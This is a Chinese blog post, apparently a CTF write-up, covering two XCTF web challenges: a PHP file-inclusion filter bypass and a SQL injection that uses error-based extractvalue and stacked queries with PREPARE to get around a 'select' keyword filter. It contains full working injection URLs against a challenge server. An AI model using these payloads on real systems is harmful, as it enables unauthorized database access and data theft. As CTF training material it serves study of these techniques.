Web_php_include 和supersqli攻防世界xctf web

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量467 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45689999/article/details/104629294
版权

Web_php_include

代码

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);//相当于过滤了php://
}
include($page);
?>

strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。
注释:该函数是区分大小写的。(菜鸟教程)
所以可以用大写PHP绕过
这里已经提示是文件包含,可以利用这个漏洞
利用php伪协议,读取目录文件dir
在这里插入图片描述
可以利用post流,执行代码
读取第一个php文件
在这里插入图片描述
这个文件内容好像没有变的样子,实际改变了,打开F12,flag在注释里

supersqli

从题目和标签大致猜到是sql注入
1.提交原本有的值1,可以看到
在这里插入图片描述
打开F12
在这里插入图片描述
是get方式

2.1后加单引号’,报错

http://111.198.29.45:34455/?inject=1'

3.加注释符–+或#,不报错

http://111.198.29.45:34455/?inject=1%27--+

以上两步,基本确定是注入
检查是否存在过滤

4.输入select

http://111.198.29.45:34455/?inject=select

返回return preg_match("/select|update|delete|drop|insert|where|./i",$inject);
即过滤以上字符
所以使用extractvalue报错注入
5.爆版本

http://111.198.29.45:34455/?inject=-1%27%20and%20extractvalue(1,concat(1,version()))--+

回显:’.18-MariaDB’
6.爆数据库

http://111.198.29.45:34455/?inject=-1%27%20and%20extractvalue(1,concat(1,database()))--+

回显:supersqli

7.爆表名,因为这里过滤了select,所以使用点击堆叠注入

http://111.198.29.45:34455/?inject=-1%27;use%20supersqli;show%20tables;--+

爆出两个表名1919810931114514和words

8.爆表1919810931114514的列

http://111.198.29.45:34455/?inject=-1%27;use%20information_schema;set%20@sql=concat(%27s%27,%27elect%20column_name%20from%20columns%20wher%27,%27e%20table_name=%221919810931114514%22%27);PREPARE%20stmt1%20FROM%20@sql;EXECUTE%20stmt1;--+

得到列:flag
9.爆列flag的字段

http://111.198.29.45:34455/?inject=-1%27;use%20supersqli;set%20@sql=concat(%27s%27,%27elect%20`flag`%20from%20`1919810931114514`%27);PREPARE%20stmt1%20FROM%20@sql;EXECUTE%20stmt1;--+

得到flag
考点:过滤了select的注入
%20是空格,%27是单引号的url编码

开往宇宙尽头
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
等风来
05-22 9660
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
Web_php_include总结五种解法大同小异
yingyugo的博客
11-18 3356
Web_php_include解题详解 ————一念既出,万山无阻 分析——解题——总结 1.分析 代码不长,咱们慢慢分析 第一句是语法高亮,show_source() 函数对文件进行语法高亮显示。 本函数是 highlight_file() 的别名。 第二句是get 传给hello参数这里可以构造payload: /?hel
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4440
ctf学习记录
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
最新发布
2401_84208172的博客
05-24 1226
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
Web_php_include
怪味巧克力的博客
05-25 4234
知识点: 1.strstr(): 定义和用法: strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。 该函数是区分大小写的, stristr() 函数不区分大小写。 语法 strstr(string,search,before_search) 参数 描述 string 必需。规定被搜索的字符串。 search 必需。规定要搜索的字符串。如果该参数是数字,则搜索匹配该数字对应的 ASCII 值的字符。 before_searc
Web_php_include-xctf
qq_43660551的博客
07-03 970
RCE-PHP
XCTF攻防世界web.doc
09-19
在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力。本WriteUp将详细解释如何在...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训】的PPT内容涵盖了Oracle财务系统的应收管理模块,这个模块是企业销售到收款流程中的关键部分。以下是基于提供的文件内容详细解析的知识点: 1. **销售到收款流程概览**: - 销售到...
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训中,主要涵盖了Oracle系统的物料管理及相关流程,旨在提升用户对物料清单(BOM)的运用和理解。以下是详细的讲解内容: 1. **物料管理**: - **系统组织架构**:Oracle系统中的组织...
XCTF_A_应付管理标准功能培训.pptx
10-11
XCTF_A_应付管理标准功能培训.pptx
Web_php_include-攻防世界
szhangliwenya的博客
03-25 1095
secure_file_priv 这个变量被用于限制导入和导出的数据目录,比如 LOAD DATA 和 SELECT ... INTO OUTFILE 语句,以及 LOAD_FILE() 函数。MySQL 服务器在启动时,会检查 secure_file_priv 变量值,如果值不安全会在错误日志中写一个 WARNING 级别的日志。如果指定了目录,MySQL 会限制只能从该目录导入、或导出到该目录。下述使用data://伪协议,它让用户控制输入流,输入php代码,造成任意代码执行。
XCTF-攻防世界CTF平台-Web类——4、Web_php_includephp中strstr()函数绕过、数据流协议)
Onlyone_1314的博客
11-14 2999
目录标题一级目录方法一、文件包含:php伪协议绕过strstr()函数方法二、文件包含:GET方式提交命令方法三、data://伪协议方法四、一句话木马连接后台方法五、data://伪协议+一句话木马 一级目录 打开题目地址: 代码: <?php show_source(__FILE__); echo $_GET['hello']; //输出hello变量指向的内容 $page=$_GET['page']; //把page变量的值赋给$page while (strstr($page
WEBWeb_php_include(多解)
sleepywin的博客
07-16 1156
解题
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 5755
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
攻防世界-Web_php_include详解
Mr_helloword的博客
08-11 8623
Web_php_include 源代码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析: strstr(): 定义和用法: 搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回
征服web第四站-攻防世界 Web_php_include 再战伪协议
weixin_68492476的博客
04-16 1722
小白全流程解读代码和自己的思路,欢迎大家一起学习和批评指正。明显是一题文件包含,因为之前也做过一些伪协议的题目,想着可能还是考这个,继续尝试做这道题。
攻防世界-web-Web_php_include(文件包含与伪协议)
2301_77300311的博客
05-04 568
先进行base64编码再urlencode后,构造data://伪协议,payload如下。strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。由于strstr()函数和函数都是区分大小写的,那么我们完全可以使用大写的PHP://来绕过过滤。既然过滤了php://的伪协议,我们可以使用其他协议,这里使用data://伪协议。从代码中得知,page参数中带有php://的都会被替换成空。方法三(php://伪协议、大小写过滤)方法二(御剑+菜刀)
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值